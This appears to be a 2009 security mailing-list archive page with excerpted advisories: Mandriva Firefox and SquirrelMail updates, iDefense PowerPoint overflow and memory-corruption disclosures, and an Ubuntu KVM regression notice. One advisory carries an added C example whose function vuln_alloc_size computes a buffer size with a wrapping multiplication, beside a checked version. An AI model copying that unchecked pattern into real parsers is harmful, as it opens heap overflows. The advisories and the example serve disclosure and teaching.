[ MDVSA-2009:111 ] firefox

2009-05-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:111
 http://www.mandriva.com/security/
 ___

 Package : firefox
 Date: May 12, 2009
 Affected: 2009.0, 2009.1
 ___

 Problem Description:

 Security vulnerabilities have been discovered in previous
 versions, and corrected in the latest Mozilla Firefox 3.x, version
 3.0.10. (CVE-2009-1302, CVE-2009-1303, CVE-2009-1304, CVE-2009-1305,
 CVE-2009-0652, CVE-2009-1306, CVE-2009-1307, CVE-2009-1308,
 CVE-2009-1309, CVE-2009-1310, CVE-2009-1311, CVE-2009-1312,
 CVE-2009-1313)
 
 This update provides the latest Mozilla Firefox 3.x to correct
 these issues.
 
 Additionally, some packages that depend on it have been rebuilt and
 are being provided as updates.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1302
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1303
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1304
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1305
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0652
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1306
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1307
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1308
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1309
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1310
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1311
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1312
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1313
 
http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.10
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 facc21339143c0d8dd8437b24847af45  
2009.0/i586/beagle-0.3.8-13.10mdv2009.0.i586.rpm
 942eeaa3bf4d919f65edbbefde5334d4  
2009.0/i586/beagle-crawl-system-0.3.8-13.10mdv2009.0.i586.rpm
 410deb94e79498f0c2a95c0de0661edc  
2009.0/i586/beagle-doc-0.3.8-13.10mdv2009.0.i586.rpm
 95aae589a2ac5b30633b41e946a0319c  
2009.0/i586/beagle-epiphany-0.3.8-13.10mdv2009.0.i586.rpm
 d99de21d9b4a859c0a7dceb3b5c88fc4  
2009.0/i586/beagle-evolution-0.3.8-13.10mdv2009.0.i586.rpm
 9208d64884b95450fee03c5bb1353e1f  
2009.0/i586/beagle-gui-0.3.8-13.10mdv2009.0.i586.rpm
 e76e116b639a5d8d929143f0d9abc8b8  
2009.0/i586/beagle-gui-qt-0.3.8-13.10mdv2009.0.i586.rpm
 b3699c915d26a62ccd1766c0c3d117e0  
2009.0/i586/beagle-libs-0.3.8-13.10mdv2009.0.i586.rpm
 dcc119cd178ff2bf112174e4b9fd92d0  
2009.0/i586/devhelp-0.21-3.6mdv2009.0.i586.rpm
 09940f8d97aaa803bdbfc26d3b77481f  
2009.0/i586/devhelp-plugins-0.21-3.6mdv2009.0.i586.rpm
 db56ccdc69898f1748193b6a243046bf  
2009.0/i586/epiphany-2.24.0.1-3.8mdv2009.0.i586.rpm
 0a87b80e58653c01eadc9212b6965edb  
2009.0/i586/epiphany-devel-2.24.0.1-3.8mdv2009.0.i586.rpm
 133ec12c3faad9623674f9acdd58289e  
2009.0/i586/firefox-3.0.10-0.1mdv2009.0.i586.rpm
 027c01f1287a1de7d70dc06927a36589  
2009.0/i586/firefox-ext-beagle-0.3.8-13.10mdv2009.0.i586.rpm
 6bf6ddd96696d36e0ad5837ac827701e  
2009.0/i586/firefox-ext-mozvoikko-0.9.5-4.6mdv2009.0.i586.rpm
 c574a4fd14d064e53ee196552a4105d6  
2009.0/i586/firefox-theme-kde4ff-0.14-4.6mdv2009.0.i586.rpm
 4b162b96b84de3a0906bb626c8c50abe  
2009.0/i586/gnome-python-extras-2.19.1-20.6mdv2009.0.i586.rpm
 761ae8f0123d9494d0149eb5321d9a8c  
2009.0/i586/gnome-python-gda-2.19.1-20.6mdv2009.0.i586.rpm
 80f09ec0a289ede7ad097f63d98df29b  
2009.0/i586/gnome-python-gda-devel-2.19.1-20.6mdv2009.0.i586.rpm
 3b7d4b7be5e106a41a03bb4b9a9b07fb  
2009.0/i586/gnome-python-gdl-2.19.1-20.6mdv2009.0.i586.rpm
 06527b12f712248fe301f441f4ec6807  
2009.0/i586/gnome-python-gtkhtml2-2.19.1-20.6mdv2009.0.i586.rpm
 ea8747930c63be07918b1f10f466dddf  
2009.0/i586/gnome-python-gtkmozembed-2.19.1-20.6mdv2009.0.i586.rpm
 d00c83e2be9acdbf8ab3bec2051bfc5f  
2009.0/i586/gnome-python-gtkspell-2.19.1-20.6mdv2009.0.i586.rpm
 add78a68e7c055cf64f66d74c6788f26  
2009.0/i586/libdevhelp-1_0-0.21-3.6mdv2009.0.i586.rpm
 238303c89c07560b4cc51e7225df887b  
2009.0/i586/libdevhelp-1-devel-0.21-3.6mdv2009.0.i586.rpm
 a76fe91a972d1ad60dbcea1c32ea6f87  
2009.0/i586/libxulrunner1.9-1.9.0.10-0.1mdv2009.0.i586.rpm
 63d7825a827a92913ad18996b72b4b75  
2009.0/i586/libxulrunner-devel-1.9.0.10-0.1mdv2009.0.i586.rpm
 27a6dd85374223b0156c3aab620276e0  
2009.0/i586/libxulrunner-unstable-devel-1.9.0.10-0.1mdv2009.0.i586.rpm
 cdabb2ed7f1063bafae518c98b89c4ff  
2009.0/i586/mozilla-firefox-ext-blogrovr-1.1.779-5.6mdv2009.0.i586.rpm
 9239b9f63ca9fe75d134374ef3c4577e  
2009.0/i586/mozilla-firefox-ext-foxmarks-2.1.0.12-2.6mdv2009.0.i586.rpm
 44fa111d4a99c2441b5ab2a7887b88dc  

iDefense Security Advisory 05.12.09: Microsoft PowerPoint Integer Overflow Vulnerability

2009-05-13 Thread iDefense Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

iDefense Security Advisory 05.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
May 12, 2009

I. BACKGROUND

Microsoft PowerPoint is an application used for constructing
presentations, and comes with the Microsoft Office suite. For more
information, see the vendor's site found at the following link.

http://office.microsoft.com/en-us/powerpoint/default.aspx

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Microsoft
Corp.'s PowerPoint could allow an attacker to execute arbitrary code
with the privileges of the current user.

The vulnerability occurs during the parsing of two related PowerPoint
record types. The first record type is used to specify collaboration
information for different slides. One of the fields in this record
contains a 32-bit integer that is used to specify the number of a
specific type of records that are present in the file. This integer is
used in a multiplication operation that calculates the size of a heap
buffer that will be used to store the records as they are read in from
the file. The calculation can overflow, resulting in an undersized heap
buffer being allocated. By providing a large value for the record count,
and inserting enough dummy records, it is possible to trigger a heap
based buffer overflow.
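The size calculation described above, reduced to an added C example that is not iDefense's or Microsoft's code: the record layout (a little-endian 32-bit count followed by 16-byte records), the function names and the sample inputs are all constructed for illustration and do not reflect the real PowerPoint format. The flawed multiplication is shown next to a checked version that rejects counts whose product would wrap or that claim more records than the input actually contains.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical record layout, constructed for this example (not the real
 * PowerPoint format): a little-endian 32-bit record count followed by
 * `count` fixed-size records of REC_SIZE bytes each. */
#define REC_SIZE 16u

/* The flawed pattern: the 32-bit product wraps silently, so a very large
 * count produces a tiny allocation while the read loop still trusts count. */
static uint32_t vuln_alloc_size(uint32_t count)
{
    return count * REC_SIZE;   /* e.g. 0x10000001 * 16 wraps to 16 */
}

/* Hardened size calculation: refuse counts whose product cannot be
 * represented, and refuse counts that claim more data than the input holds. */
static int safe_alloc_size(uint32_t count, size_t avail, size_t *out)
{
    if (count > UINT32_MAX / REC_SIZE)
        return -1;                       /* multiplication would overflow */
    size_t need = (size_t)count * REC_SIZE;
    if (need > avail)
        return -1;                       /* count exceeds what the file contains */
    *out = need;
    return 0;
}

/* Parse the container: decode the count, validate it, then copy the records
 * into a heap buffer sized from the validated product. */
static int parse_records(const uint8_t *buf, size_t len,
                         uint8_t **out, size_t *out_len)
{
    if (len < 4)
        return -1;
    uint32_t count = (uint32_t)buf[0] | ((uint32_t)buf[1] << 8) |
                     ((uint32_t)buf[2] << 16) | ((uint32_t)buf[3] << 24);
    size_t need;
    if (safe_alloc_size(count, len - 4, &need) != 0)
        return -1;
    uint8_t *records = malloc(need ? need : 1);
    if (records == NULL)
        return -1;
    memcpy(records, buf + 4, need);      /* bounded by the validated size */
    *out = records;
    *out_len = need;
    return 0;
}

/* Wrapper returning the parsed byte count, or -1 when the input is rejected. */
static long parsed_len(const uint8_t *buf, size_t len)
{
    uint8_t *records;
    size_t n;
    if (parse_records(buf, len, &records, &n) != 0)
        return -1;
    free(records);
    return (long)n;
}

/* Constructed sample inputs: 4-byte count plus 32 bytes of record payload. */
static const uint8_t good_input[36]       = { 0x02, 0x00, 0x00, 0x00 }; /* count 2: fits */
static const uint8_t huge_count_input[36] = { 0x01, 0x00, 0x00, 0x10 }; /* count 0x10000001: product wraps */
static const uint8_t short_input[36]      = { 0x05, 0x00, 0x00, 0x00 }; /* count 5: needs 80 bytes, only 32 present */

int main(void)
{
    printf("unchecked size for count 0x10000001: %u bytes\n",
           vuln_alloc_size(0x10000001u));
    printf("good input: %ld\n", parsed_len(good_input, sizeof good_input));
    printf("huge count: %ld\n", parsed_len(huge_count_input, sizeof huge_count_input));
    printf("short input: %ld\n", parsed_len(short_input, sizeof short_input));
    return 0;
}
```

The two checks in `safe_alloc_size` are independent: the division test catches the arithmetic wrap regardless of input length, and the comparison against the remaining input catches a count that is representable but still larger than the data the file carries, which is the other way an attacker-controlled count turns into an out-of-bounds read or copy.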

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user opening the file. To exploit this
vulnerability, an attacker needs to convince a user to open a malicious
file. If the targeted user is running PowerPoint 2000, and the Office
Document Open Confirmation Tool is not installed, then it is possible
to exploit this vulnerability directly through the browser.

Modern versions of Windows (XP, Server 2003, Vista, Server 2008) contain
heap allocators with protections against generic heap exploitation
techniques. These protections include heap cookies and safe unlinking
techniques. However, by default the Office applications use a custom
allocator that does not use the normal heap allocator, and does not
contain the same level of protection.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the
following versions of PowerPoint:

PowerPoint 2000 SP3

PowerPoint 2002 (XP) SP2

PowerPoint 2003 SP2

PowerPoint 2003 SP3

PowerPoint 2007, PowerPoint 2007 SP1, and PowerPoint Viewer 2003 are not
affected.

V. WORKAROUND

Since PowerPoint Viewer 2003 is not affected, using it to view untrusted
or unexpected PowerPoint files is a valid workaround.

VI. VENDOR RESPONSE

Microsoft has released a patch which addresses this issue. For more
information, consult their advisory at the following URL:

http://www.microsoft.com/technet/security/Bulletin/MS09-017.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2009-0221 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/03/2008  - Initial Contact
09/03/2008  - Vendor Acknowledgement
09/04/2008  - PoC Requested
09/09/2008  - PoC Sent
09/17/2008  - PoC Resend Requested
09/17/2008  - PoC Sent
10/01/2008  - Vendor Case Number Issued
12/11/2008  - Vendor Status Update
01/16/2009  - Disclosure Projected
01/20/2009  - Vendor Clarification
02/19/2009  - Vendor Status Update
05/12/2009  - Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFKCgKSbjs6HoxIfBkRAlILAKC4DED6VdCInUQPULgvmqQ930igcQCgrHY9
TS1yeuJfa/24dH5iFaGWhpY=
=ZXSN
-END PGP SIGNATURE-


[ MDVSA-2009:111-1 ] firefox

2009-05-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:111-1
 http://www.mandriva.com/security/
 ___

 Package : firefox
 Date: May 13, 2009
 Affected: 2009.0
 ___

 Problem Description:

 Security vulnerabilities have been discovered in previous
 versions, and corrected in the latest Mozilla Firefox 3.x, version
 3.0.10. (CVE-2009-1302, CVE-2009-1303, CVE-2009-1304, CVE-2009-1305,
 CVE-2009-0652, CVE-2009-1306, CVE-2009-1307, CVE-2009-1308,
 CVE-2009-1309, CVE-2009-1310, CVE-2009-1311, CVE-2009-1312,
 CVE-2009-1313)
 
 This update provides the latest Mozilla Firefox 3.x to correct
 these issues.
 
 Additionally, some packages that depend on it have been rebuilt and
 are being provided as updates.

 Update:

 The recent Mozilla Firefox update missed the Firefox language packs
 for Mandriva Linux 2009. This update provides them, fixing the issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1302
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1303
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1304
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1305
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0652
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1306
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1307
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1308
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1309
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1310
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1311
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1312
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1313
 
http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.10
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 428c63f10fadf9d563ec2842125955eb  
2009.0/i586/firefox-af-3.0.10-0.1mdv2009.0.i586.rpm
 fabdad0d8036a5dc9d8e6cd0d6f587ef  
2009.0/i586/firefox-ar-3.0.10-0.1mdv2009.0.i586.rpm
 8dba866bf456bf6e8076a2e0fb1e45a2  
2009.0/i586/firefox-be-3.0.10-0.1mdv2009.0.i586.rpm
 6ee779a9d993a4c04650e0a23d681601  
2009.0/i586/firefox-bg-3.0.10-0.1mdv2009.0.i586.rpm
 c36835a0e2e9ff4e6b43defbeab6f787  
2009.0/i586/firefox-bn-3.0.10-0.1mdv2009.0.i586.rpm
 c440e6dbcf73db73403d08278be48936  
2009.0/i586/firefox-ca-3.0.10-0.1mdv2009.0.i586.rpm
 ac843b5e22e0e29094f3d6d059896850  
2009.0/i586/firefox-cs-3.0.10-0.1mdv2009.0.i586.rpm
 d524e266442215bd69577532b29848dd  
2009.0/i586/firefox-cy-3.0.10-0.1mdv2009.0.i586.rpm
 2cac493126fc4f6e50de0c9428303aac  
2009.0/i586/firefox-da-3.0.10-0.1mdv2009.0.i586.rpm
 1c288234043f76e349200d6650afd4a1  
2009.0/i586/firefox-de-3.0.10-0.1mdv2009.0.i586.rpm
 28a974d0e09b7d6eddecbf6ac7cf3fff  
2009.0/i586/firefox-el-3.0.10-0.1mdv2009.0.i586.rpm
 d2bb49a40f9626fe443ef5f2c73a4063  
2009.0/i586/firefox-en_GB-3.0.10-0.1mdv2009.0.i586.rpm
 7c94bab7d47bba06200b253408b922ab  
2009.0/i586/firefox-eo-3.0.10-0.1mdv2009.0.i586.rpm
 d98276d0f1a26ee892bd845b9ae66762  
2009.0/i586/firefox-es_AR-3.0.10-0.1mdv2009.0.i586.rpm
 208435a4d629bee649dc22440a174203  
2009.0/i586/firefox-es_ES-3.0.10-0.1mdv2009.0.i586.rpm
 bac010ff6be1a42cfbef6aff68a8380c  
2009.0/i586/firefox-et-3.0.10-0.1mdv2009.0.i586.rpm
 319256fe0b2e3fa32fb27b880fd12519  
2009.0/i586/firefox-eu-3.0.10-0.1mdv2009.0.i586.rpm
 9ac30eebf8c9505ba0c99158e372b303  
2009.0/i586/firefox-fi-3.0.10-0.1mdv2009.0.i586.rpm
 03560e30d2bd62520cf9665184c37f9d  
2009.0/i586/firefox-fr-3.0.10-0.1mdv2009.0.i586.rpm
 ae16ba2e645c66b80c893fecd5bb0866  
2009.0/i586/firefox-fy-3.0.10-0.1mdv2009.0.i586.rpm
 849c6cc485543fee318dd00d1e011b96  
2009.0/i586/firefox-ga_IE-3.0.10-0.1mdv2009.0.i586.rpm
 00c4f1e1c75be22c9749bcb6e19ee1a8  
2009.0/i586/firefox-gl-3.0.10-0.1mdv2009.0.i586.rpm
 80bb9fe95926ada2c82e50d4247acfff  
2009.0/i586/firefox-gu_IN-3.0.10-0.1mdv2009.0.i586.rpm
 db271c92cbc88a0750b5ab8b4b805c34  
2009.0/i586/firefox-he-3.0.10-0.1mdv2009.0.i586.rpm
 79ff9ecae9384330c16922406c51ffd6  
2009.0/i586/firefox-hi-3.0.10-0.1mdv2009.0.i586.rpm
 7e87efe5ddaf54e6966d1886a746dcfe  
2009.0/i586/firefox-hu-3.0.10-0.1mdv2009.0.i586.rpm
 add0fd84eb10233c260950b01a594595  
2009.0/i586/firefox-id-3.0.10-0.1mdv2009.0.i586.rpm
 bc52e2cb6e992d7fb27ac61be4047f35  
2009.0/i586/firefox-is-3.0.10-0.1mdv2009.0.i586.rpm
 7bb1d34c83b53b4a30dac101bcb7da1c  
2009.0/i586/firefox-it-3.0.10-0.1mdv2009.0.i586.rpm
 7a159b8384a18577b0ccc3aa0564fe33  
2009.0/i586/firefox-ja-3.0.10-0.1mdv2009.0.i586.rpm
 b67641682152447b0045a977011de2d0  
2009.0/i586/firefox-ka-3.0.10-0.1mdv2009.0.i586.rpm
 954202831867180681e99be7e9d5cbca  

iDefense Security Advisory 05.12.09: Microsoft PowerPoint Build List Memory Corruption Vulnerability

2009-05-13 Thread iDefense Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

iDefense Security Advisory 05.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
May 12, 2009

I. BACKGROUND

Microsoft PowerPoint is an application used for constructing
presentations, and comes with the Microsoft Office suite. For more
information, see the vendor's site found at the following link.

http://office.microsoft.com/en-us/powerpoint/default.aspx

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in Microsoft
Corp.'s PowerPoint could allow an attacker to execute arbitrary code
with the privileges of the current user.

The vulnerability occurs during the parsing of the BuildList record.
This record is a container for other records that describe charts and
diagrams in the PowerPoint file. By inserting multiple BuildList
records with ChartBuild containers inside of them, it is possible to
trigger a memory corruption vulnerability during the parsing of the
ChartBuild container's contents. This allows an attacker to control an
object pointer, which can lead to attacker supplied function pointers
being dereferenced.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user opening the file. To exploit this
vulnerability, an attacker needs to convince a user to open a malicious
file. If the targeted user is running PowerPoint 2000, and the Office
Document Open Confirmation Tool is not installed, then it is possible
to exploit this vulnerability directly through the browser.

Due to the nature of the vulnerability, relatively precise control of
the process memory layout is needed to successfully exploit this
vulnerability. iDefense Labs has developed exploit code that
successfully exploits this vulnerability.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the
following versions of PowerPoint:

PowerPoint 2000 SP3

PowerPoint 2002 (XP) SP3

PowerPoint 2003 SP2

PowerPoint 2003 SP3

PowerPoint 2007

PowerPoint 2007 SP1

PowerPoint Viewer 2003

V. WORKAROUND

Use Microsoft's MOICE (Office Isolated Conversion Environment) tool to
convert files to the new XML format.

VI. VENDOR RESPONSE

Microsoft has released a patch which addresses this issue. For more
information, consult their advisory at the following URL:

http://www.microsoft.com/technet/security/Bulletin/MS09-017.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2009-0224 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/06/2008  - Initial Contact
10/06/2008  - Initial Response
10/06/2008  - Researcher sent Inquiry to Vendor
10/07/2008  - Case number assigned
10/07/2008  - Initial response to Researcher Inquiry
12/12/2008  - Status Update Received - estimated release date 03/10/2009
02/24/2009  - Researcher restates Inquiry to Vendor
02/24/2009  - Status Update Received - estimated release date 06/09/2009
02/24/2009  - Vendor provides response to Inquiry
05/12/2009  - Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFKCfsSbjs6HoxIfBkRAowbAJ9zDkOUM15X5jJ9v6XEqkIzy2qmkwCfVMWU
0hS8cKkE4awCn4LhwK99Es4=
=gpZa
-END PGP SIGNATURE-


[ MDVSA-2009:110 ] squirrelmail

2009-05-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:110
 http://www.mandriva.com/security/
 ___

 Package : squirrelmail
 Date: May 12, 2009
 Affected: Corporate 4.0
 ___

 Problem Description:

 Multiple vulnerabilities have been identified and corrected in
 squirrelmail:
 
 Two issues were fixed that both allowed an attacker to run arbitrary
 script (XSS) on most any SquirrelMail page by getting the user to
 click on specially crafted SquirrelMail links (CVE-2009-1578).
 
 An issue was fixed wherein input to the contrib/decrypt_headers.php
 script was not sanitized and allowed arbitrary script execution upon
 submission of certain values (CVE-2009-1578).
 
 An issue was fixed that allowed arbitrary server-side code execution
 when SquirrelMail was configured to use the example map_yp_alias
 username mapping functionality (CVE-2009-1579).
 
 An issue was fixed that allowed an attacker to possibly steal user
 data by hijacking the SquirrelMail login session (CVE-2009-1580).
 
 An issue was fixed that allowed phishing and cross-site scripting
 (XSS) attacks to be run by surreptitious placement of content in
 specially-crafted emails sent to SquirrelMail users (CVE-2009-1581).
 
 Additionally, many of the bundled plugins have been upgraded. Basically
 this is a synchronization with the latest squirrelmail package found
 in Mandriva Cooker. The rpm changelog will reveal all the changes
 (rpm -q --changelog squirrelmail).
 
 The updated packages have been upgraded to the latest version of
 squirrelmail to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1578
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1579
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1580
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1581
 ___

 Updated Packages:

 Corporate 4.0:
 d8e8e8560b8b5cf89bb06dbda75033ef  
corporate/4.0/i586/squirrelmail-1.4.18-0.1.20060mlcs4.noarch.rpm
 0ba6c8b99d8ccac0df0d3e90a7d70f47  
corporate/4.0/i586/squirrelmail-ar-1.4.18-0.1.20060mlcs4.noarch.rpm
 54b0bb74cba4da1dffdf0dc044de0986  
corporate/4.0/i586/squirrelmail-bg-1.4.18-0.1.20060mlcs4.noarch.rpm
 fe1cfa4f6317fd8e295e0265be5da46b  
corporate/4.0/i586/squirrelmail-bn-1.4.18-0.1.20060mlcs4.noarch.rpm
 46835353a19ca7e290ee0f538dc1cfec  
corporate/4.0/i586/squirrelmail-ca-1.4.18-0.1.20060mlcs4.noarch.rpm
 786fcdba5121c48523b856cf3ff2c7a2  
corporate/4.0/i586/squirrelmail-cs-1.4.18-0.1.20060mlcs4.noarch.rpm
 a792847e8d14f3249700e6779d2abbf1  
corporate/4.0/i586/squirrelmail-cy-1.4.18-0.1.20060mlcs4.noarch.rpm
 b539efa2ba48b7b20f7c5e095fd43286  
corporate/4.0/i586/squirrelmail-cyrus-1.4.18-0.1.20060mlcs4.noarch.rpm
 a57030df0e927b18ff0d40d745400cec  
corporate/4.0/i586/squirrelmail-da-1.4.18-0.1.20060mlcs4.noarch.rpm
 3d97a69708fef53af1c525c39c093b07  
corporate/4.0/i586/squirrelmail-de-1.4.18-0.1.20060mlcs4.noarch.rpm
 98441c32e477f087e78782a37e15ff4c  
corporate/4.0/i586/squirrelmail-el-1.4.18-0.1.20060mlcs4.noarch.rpm
 98b2e8b09c82a5ebc00047683bc6b20b  
corporate/4.0/i586/squirrelmail-en-1.4.18-0.1.20060mlcs4.noarch.rpm
 af04c8fd5c883b91959969d29c3af0cb  
corporate/4.0/i586/squirrelmail-es-1.4.18-0.1.20060mlcs4.noarch.rpm
 7e2d7a7bbab015d551b058352b21162c  
corporate/4.0/i586/squirrelmail-et-1.4.18-0.1.20060mlcs4.noarch.rpm
 e3b34eb6311c4ee45b3e39285cc547f4  
corporate/4.0/i586/squirrelmail-eu-1.4.18-0.1.20060mlcs4.noarch.rpm
 8f4b2e47224cd83b244745b11f7cda9f  
corporate/4.0/i586/squirrelmail-fa-1.4.18-0.1.20060mlcs4.noarch.rpm
 fa7b77a672e5afa5e09b771d1ead14ff  
corporate/4.0/i586/squirrelmail-fi-1.4.18-0.1.20060mlcs4.noarch.rpm
 cb03089c1d10100f95b51e9345cc276b  
corporate/4.0/i586/squirrelmail-fo-1.4.18-0.1.20060mlcs4.noarch.rpm
 bb4bbb512b376271caff2ab4677a47e9  
corporate/4.0/i586/squirrelmail-fr-1.4.18-0.1.20060mlcs4.noarch.rpm
 2dcc5aee1f396884ea1f74c22b12c33a  
corporate/4.0/i586/squirrelmail-fy-1.4.18-0.1.20060mlcs4.noarch.rpm
 b87f520a511a53315ac9e1d594b7e3b9  
corporate/4.0/i586/squirrelmail-he-1.4.18-0.1.20060mlcs4.noarch.rpm
 4fdce8e38907de080ed1e1b76ef1d738  
corporate/4.0/i586/squirrelmail-hr-1.4.18-0.1.20060mlcs4.noarch.rpm
 0033224ec4127bd3768ec8b04b8de062  
corporate/4.0/i586/squirrelmail-hu-1.4.18-0.1.20060mlcs4.noarch.rpm
 18abc4c3cef94dc46cf26f33c3810e01  
corporate/4.0/i586/squirrelmail-id-1.4.18-0.1.20060mlcs4.noarch.rpm
 53c1d4d450cfa0c73e146aadf151d98b  
corporate/4.0/i586/squirrelmail-is-1.4.18-0.1.20060mlcs4.noarch.rpm
 aff35aa1c9e1e1e5be59b51b24ed1dbd  
corporate/4.0/i586/squirrelmail-it-1.4.18-0.1.20060mlcs4.noarch.rpm
 c1b86cbcf1f7060fa760f58cd10862b6 

[USN-776-2] KVM regression

2009-05-13 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-776-2   May 13, 2009
kvm regression
https://launchpad.net/bugs/375937
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  kvm 1:62+dfsg-0ubuntu8.2

After a standard system upgrade you need to restart all KVM VMs to effect
the necessary changes.

Details follow:

USN-776-1 fixed vulnerabilities in KVM. Due to an incorrect fix, a
regression was introduced in Ubuntu 8.04 LTS that caused KVM to fail to
boot virtual machines started via libvirt. This update fixes the problem.
We apologize for the inconvenience.

Original advisory details:

 Avi Kivity discovered that KVM did not correctly handle certain disk
 formats. A local attacker could attach a malicious partition that would
 allow the guest VM to read files on the VM host. (CVE-2008-1945,
 CVE-2008-2004)

 Alfredo Ortega discovered that KVM's VNC protocol handler did not
 correctly validate certain messages. A remote attacker could send
 specially crafted VNC messages that would cause KVM to consume CPU
 resources, leading to a denial of service. (CVE-2008-2382)

 Jan Niehusmann discovered that KVM's Cirrus VGA implementation over VNC
 did not correctly handle certain bitblt operations. A local attacker could
 exploit this flaw to potentially execute arbitrary code on the VM host or
 crash KVM, leading to a denial of service. (CVE-2008-4539)

 It was discovered that KVM's VNC password checks did not use the correct
 length. A remote attacker could exploit this flaw to cause KVM to crash,
 leading to a denial of service. (CVE-2008-5714)


Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/k/kvm/kvm_62+dfsg-0ubuntu8.2.diff.gz
  Size/MD5:43096 333b89921844b52e00b05172a49728e3
http://security.ubuntu.com/ubuntu/pool/main/k/kvm/kvm_62+dfsg-0ubuntu8.2.dsc
